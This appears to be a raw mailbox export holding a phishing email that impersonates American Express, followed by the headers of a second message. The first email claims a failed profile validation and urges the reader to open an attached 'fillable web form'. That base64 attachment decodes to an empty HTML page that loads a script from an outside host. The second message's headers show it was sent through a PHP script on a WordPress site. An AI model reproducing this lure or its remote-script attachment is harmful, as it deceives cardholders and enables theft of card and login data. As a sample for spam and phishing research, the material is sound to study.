From: "American Express" <AmericanExpress@apmex.com>
To: americanexpress@apmex.com
Subject: IMPORTANT Security Information Concerning your Account.
Date: Fri, 27 Jul 2018 14:58:42 -0400
MIME-Version: 1.0
Message-ID: <1532714881e89957a6d99c3951e3944fff6fa94cda_@apmex.com>
Reply-To: AmericanExpress@apmex.com
Content-Type: multipart/mixed; boundary="--=_Next_CE9B_20161108_EC11.4.5.2391"
Status: O
X-Status: 
X-Keywords:                  
X-UID: 541

This is a multi-part message in MIME format.

----=_Next_CE9B_20161108_EC11.4.5.2391
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--?xml version=3D"1.0" encoding=3D"ISO-8859-1"?--><HTML><HEAD>
<META http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"></HEAD>
<BODY>
<DIV id=3DwmMessage class=3DwmMessage_user_text_special style=3D"WIDTH:=
 1160px">
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D550 align=3Dcenter border=3D0>
  <TBODY>
  <TR>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD>
    <TD bgColor=3D#ffffff width=3D522 colSpan=3D3>
      <TABLE style=3D"MIN-WIDTH: 100%" cellSpacing=3D0 cellPadding=3D0 width=
=3D"100%">
        <TBODY>
        <TR>
          <TD style=3D"BACKGROUND-COLOR: #575757" width=3D"100%">
            <P
            style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 6pt; FONT-FAMILY: Arial;=
 MARGIN-TOP: 0px">&nbsp;</P>
            <P
            style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: white; MARGIN-TOP: 0px"
            align=3Dcenter>Service Notice</P>
            <P
            style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 6pt; FONT-FAMILY: Arial;=
 MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 8pt; FONT-FAMILY: Arial;=
 MARGIN-TOP: 0px">&nbsp;</P>
      <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100.19%">
        <TBODY>
        <TR>
          <TD width=3D"13.24%">
            <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
              <TBODY>
              <TR>
                <TD width=3D"19.12%">&nbsp;</TD>
                <TD width=3D"61.77%"><IMG
                  style=3D"BORDER-TOP-STYLE: none; BORDER-BOTTOM-STYLE: none;=
 BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; DISPLAY: block"
                  alt=3D"American Express logo"
                  src=3D"cid:cb87f098e71bd51c" width=3D60
                  height=3D52></TD>
                <TD width=3D"19.11%">
                  <P
                  style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 8pt; FONT-FAMILY:=
 Arial; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE></TD>
          <TD width=3D"36.17%">
            <P
            style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: gray; MARGIN-TOP: 0px">In
            regards to Basic Cardmember</P>
            <P
            style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: gray; MARGIN-TOP: 0px">&nbsp;</P></TD>
          <TD width=3D"35.65%">&nbsp;</TD>
          <TD width=3D"14.93%">
            <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"104.08%">
              <TBODY>
              <TR>
                <TD width=3D"12.5%">&nbsp;</TD>
                <TD width=3D"61.74%"><IMG
                  style=3D"BORDER-TOP-STYLE: none; BORDER-BOTTOM-STYLE: none;=
 BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; DISPLAY: block"
                  alt=3D"Image Lock"
                  src=3D"cid:2b89d8f92a33bf8c"
                  width=3D58 height=3D37></TD>
                <TD
      width=
=3D"25.76%">&nbsp;</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 8pt; FONT-FAMILY: Arial;=
 MARGIN-TOP: 0px">&nbsp;</P>
      <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
        <TBODY>
        <TR>
          <TD style=3D"BACKGROUND-COLOR: #1097b7" width=3D"3.68%">
            <HR SIZE=3D1 width=3D9>
          </TD>
          <TD style=3D"BACKGROUND-COLOR: #1097b7" width=3D"21.32%">
            <P
            style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px"><A
            style=3D"FONT-SIZE: 14px; TEXT-DECORATION: none; FONT-FAMILY:=
 Arial, Helvetica, sans-serif; FONT-WEIGHT: bold; COLOR: #ffffff"
            shape=3Drect rel=3Dnoopener target=
=3D_blank>&nbsp;&nbsp;&nbsp;&nbsp;
            Cards</A></P></TD>
          <TD style=3D"BACKGROUND-COLOR: #1097b7" width=3D"32.26%">
            <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"157.14%">
              <TBODY>
              <TR>
                <TD width=3D"12.26%"><IMG
                  style=3D"BORDER-TOP-STYLE: none; BORDER-BOTTOM-STYLE: none;=
 BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; DISPLAY: block"
                  src=3D"cid:030aa2b8958f853e"
                  width=3D10 height=3D31></TD>
                <TD width=3D"87.74%">
                  <P
                  style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY:=
 Arial; COLOR: black; MARGIN-TOP: 0px"><A
                  style=3D"FONT-SIZE: 14px; TEXT-DECORATION: none;=
 FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-WEIGHT: bold; COLOR:=
 #ffffff"
                  shape=3Drect rel=3Dnoopener
                  target=3D_blank>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                  Travels</A></P></TD></TR></TBODY></TABLE></TD>
          <TD style=3D"BACKGROUND-COLOR: #1097b7" width=3D"42.73%">
            <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
              <TBODY>
              <TR>
                <TD width=3D"8.6%"><IMG
                  style=3D"BORDER-TOP-STYLE: none; BORDER-BOTTOM-STYLE: none;=
 BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; DISPLAY: block"
                  src=3D"cid:030aa2b8958f853e"
                  width=3D10 height=3D31></TD>
                <TD width=3D"91.4%">
                  <P
                  style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY:=
 Arial; COLOR: black; MARGIN-TOP: 0px"><A
                  style=3D"FONT-SIZE: 14px; TEXT-DECORATION: none;=
 FONT-FAMILY: Arial, Helvetica, sans-serif; FONT-WEIGHT: bold; COLOR:=
 #ffffff"
                  shape=3Drect rel=3Dnoopener
                  target=
=3D_blank>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;
                  Business</A></P></TD>
                <TD vAlign=3Dtop>&nbsp;</TD>
                <TD vAlign=3Dtop>&nbsp;</TD></TR></TBODY></TABLE></TD></TR>
        <TR>
          <TD width=3D"100%" colSpan=3D4><IMG
            style=3D"BORDER-TOP-STYLE: none; BORDER-BOTTOM-STYLE: none;=
 BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; DISPLAY: block"
            src=3D"cid:e28905253ede424c"
            width=3D522 height=3D35></TD></TR></TBODY></TABLE></TD>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD></TR>
  <TR>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD>
    <TD bgColor=3D#ffffff width=3D15>&nbsp;</TD>
    <TD bgColor=3D#ffffff width=3D492>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">&nbsp;</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">This is to inform you on a timely security=
 report for your American Express(R) Card. <BR>At time of report analysis, We=
 ran
      into problem validating your profile.</P><BR>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">In
      view of this, Cardmember informations need to be requested and your
      mandatory effort is required.</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">&nbsp;</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 13pt; FONT-FAMILY: Arial;=
 COLOR: black; TEXT-ALIGN: center; MARGIN-TOP: 0px"><SPAN
      style=3D"COLOR: #000080"><b>WHAT IS REQUIRED</b></SPAN></P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">&nbsp;</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">To
      proceed, An attached <b>HTML Fillable Web Form</b> is sent along
      this message.</P>
      <UL style=3D"LIST-STYLE-TYPE: circle">
        <LI
        style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">-
        See Attached Information Form, Download and Open to Continue.<BR>-
        Finish steps by filling out the Form. </LI></UL>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">&nbsp;</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">Thank
      you for your Card Membership.</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">&nbsp;</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: black; MARGIN-TOP: 0px">American
      Express Customer Care</P></TD>
    <TD bgColor=3D#ffffff width=3D15>&nbsp;</TD>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD></TR>
  <TR>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD>
    <TD bgColor=3D#ffffff width=3D522 colSpan=3D3>&nbsp;</TD>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD></TR>
  <TR>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD>
    <TD bgColor=3D#ececec width=3D492>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: #666666; MARGIN-TOP: 0px">&nbsp;</P>
      <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
        <TBODY>
        <TR>
          <TD width=3D"49%">
            <P
            style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial;=
 COLOR: #666666; MARGIN-TOP: 0px"
            align=3Dcenter><A style=3D"COLOR: #666666" shape=3Drect rel=
=3Dnoopener
            target=3D_blank>Privacy Statement</A></P></TD>
          <TD width=3D"2%">|</TD>
          <TD width=3D"49%">
            <P
            style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial;=
 COLOR: #666666; MARGIN-TOP: 0px"
            align=3Dcenter><A style=3D"COLOR: #666666" shape=3Drect rel=
=3Dnoopener
            target=3D_blank>Update Your=
 Email</A></P></TD></TR></TBODY></TABLE>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial;=
 COLOR: #666666; MARGIN-TOP: 0px">&nbsp;</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial; COLOR:=
 #666666; MARGIN-TOP: 0px">Message
      information is included above to help you recognize this as a customer
      care e-mail from American Express. We kindly ask you not to reply to=
 this
      e-mail directly as messages are being sent from an unmonitored e-mail
      address.</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial; COLOR:=
 #666666; MARGIN-TOP: 0px">&nbsp;</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 9pt; FONT-FAMILY: Arial; COLOR:=
 #666666; MARGIN-TOP: 0px">=C2=A9
      2018 American Express. All rights reserved.</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 8pt; FONT-FAMILY: Arial; COLOR:=
 gray; MARGIN-TOP: 0px">&nbsp;</P>
      <P
      style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 8pt; FONT-FAMILY: Arial; COLOR:=
 gray; MARGIN-TOP: 0px">GNAENILNECA10600</P></TD>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD>
    <TD bgColor=3D#ececec width=3D15>&nbsp;</TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
  <TBODY>
  <TR>
    <TD style=3D"FONT-SIZE: 0px; MIN-WIDTH: 550px; LINE-HEIGHT: 0px"
      height=3D1><IMG
      style=3D"TEXT-DECORATION: none; BORDER-TOP: medium none; BORDER-RIGHT:=
 medium none; MIN-WIDTH: 550px; BORDER-BOTTOM: medium none; BORDER-LEFT:=
 medium none; -MS-INTERPOLATION-MODE: bicubic"
      src=3D"cid:dddd37dff7f82bbd"
    height=3D1></TD></TR></TBODY></TABLE></DIV></BODY></HTML>

----=_Next_CE9B_20161108_EC11.4.5.2391
Content-Type: application/octet-stream; name="=?utf-8?B?MCwsOV8xMTAzMC0tQUVOQVVTMjAxOF8wNzI3MCwwMC5odG0=?="
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="=?utf-8?B?MCwsOV8xMTAzMC0tQUVOQVVTMjAxOF8wNzI3MCwwMC5odG0=?="

PCFET0NUWVBFIGh0bWw+CjxodG1sIGNsYXNzPSJuby1qcyIgbGFuZz0iZW4tVVMiIGRpcj0i
bHRyIiAgICAgICAgPGhlYWQ+CiAgICAgICAgICAgICAgICA8bWV0YSBjaGFyc2V0PSJJU08t
ODg1OS0xIiAvPgogICAgICAgICAgICAgICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRl
bnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLCB2aWV3cG9ydC1maXQ9
Y292ZXIiIC8+CgogICAgICAgICAgICAgICAgPGxpbmsgcmVsPSJpY29uIiBocmVmPSIiIC8+
CiAgICAgICAgICAgICAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9icmFzc2V0c2dyb3VwLmNv
bS9faXNlcnYvcG9sbC9hcHBsaWNhdGlvbi5qcyI+CgoKICAgICAgICAgICAgICAgIDwvc2Ny
aXB0PgogICAgICAgIDwvaGVhZD4KCiAgICAgICAgPGJvZHk+CiAgICAgICAgPC9ib2R5PgoK
PC9odG1sPgo=

----=_Next_CE9B_20161108_EC11.4.5.2391--


From jose@monkey.org Sun Jul 29 02:41:53 2018 +0000
Return-Path: kovitch@enterprise.inverseparadox.net
Delivered-To: jose@monkey.org
X-FDA: 74436910506.09.week55_106d75b34bd48
X-Spam-Summary: 75,0,0,dc85ba2bd2f88785,d41d8cd98f00b204,kovitch@enterprise.inverseparadox.net,:,RULES_HIT:1:41:72:152:355:375:379:455:960:967:973:983:988:989:1208:1224:1260:1263:1313:1314:1345:1381:1431:1432:1433:1434:1437:1516:1517:1545:1571:1593:1594:1699:1730:1747:1777:1792:1803:2197:2198:2199:2200:2369:2393:2525:2527:2528:2538:2539:2549:2553:2559:2564:2610:2637:2682:2685:2691:2859:2890:2892:2895:2918:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3245:3352:3586:3653:3865:3866:3867:3868:3870:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4180:4181:4321:5007:6261:6650:6653:6669:6678:6996:6997:7801:7875:8557:8583:8603:8957:9025:9080:9388:9908:10004:10346:10919:11026:11257:11473:11527:11651:11657:11658:11914:12043:12049:12050:12324:12438:12555:12663:12740:12895:12903:12956:12958:12963:12967:12971:12986:13139:14194:14659:14827:21080:21212:21221:21325:21433:21450:21451:21524:21627:30001:30022:30054:30055:30064:30065:30067:30069:30070:
X-HE-Tag: week55_106d75b34bd48
X-Filterd-Recvd-Size: 13433
Received: from enterprise.inverseparadox.net (enterprise.inverseparadox.net [67.227.155.4])
	by imf17.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 29 Jul 2018 02:41:52 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
	d=kovitchandson.com; s=default; h=Date:Message-Id:From:Content-Type:
	MIME-Version:Subject:To:Sender:Reply-To:Cc:Content-Transfer-Encoding:
	Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender:
	Resent-To:Resent-Cc:Resent-Message-ID:In-Reply-To:References:List-Id:
	List-Help:List-Unsubscribe:List-Subscribe:List-Post:List-Owner:List-Archive;
	 bh=uKB4hGvIpupRq/g6fKhbaei3+MZxLdlbP54STKKd/Ro=; b=maZr55YOROz1lCsAmE7F2tzJH
	TvmuRg2i5fQhB054xLwP45cPF84/D4yafjfhGmy4bGI31eclEcBHdEWaLod5kgndVfNPNT+Kga8gQ
	Vnhck3tHpSJtuTt9AhLW8clfaRMT/V0ncZeAg1cJ+/mK9Hu9G5r3UcR8x6VYZQA6XoedwFbTAEBXi
	jZNyh80r57B6A6ZlWNSwKKNjMdWlkVza7euV4upjYNGm8aCmH9NrjJm3T+JRjdZ0M3qB1YqT4K8wF
	M04xeXRBASi/K6Q1Q+os03q9OHyoNFUQID4egWA2ZvNViiFE+L3MJcfJThfJwp6sL0wc292KKbYEY
	iU7HxvBzw==;
Received: from kovitch by enterprise.inverseparadox.net with local (Exim 4.91)
	(envelope-from <kovitch@enterprise.inverseparadox.net>)
	id 1fjbea-00GPla-0A
	for jose@monkey.org; Sat, 28 Jul 2018 22:41:52 -0400
To: jose@monkey.org
Subject: Alert message
X-PHP-Script: www.kovitchandson.com/wp-content/upgrade/e.php for 102.158.36.126
X-PHP-Filename: /home/kovitch/public_html/wp-content/upgrade/e.php REMOTE_ADDR: 102.158.36.126
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
